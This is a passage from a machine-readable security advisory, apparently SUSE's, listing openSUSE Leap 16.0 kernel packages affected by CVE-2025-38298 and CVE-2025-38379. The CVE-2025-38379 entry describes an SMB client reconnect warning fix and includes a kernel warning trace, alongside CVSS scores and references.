"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-38298"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
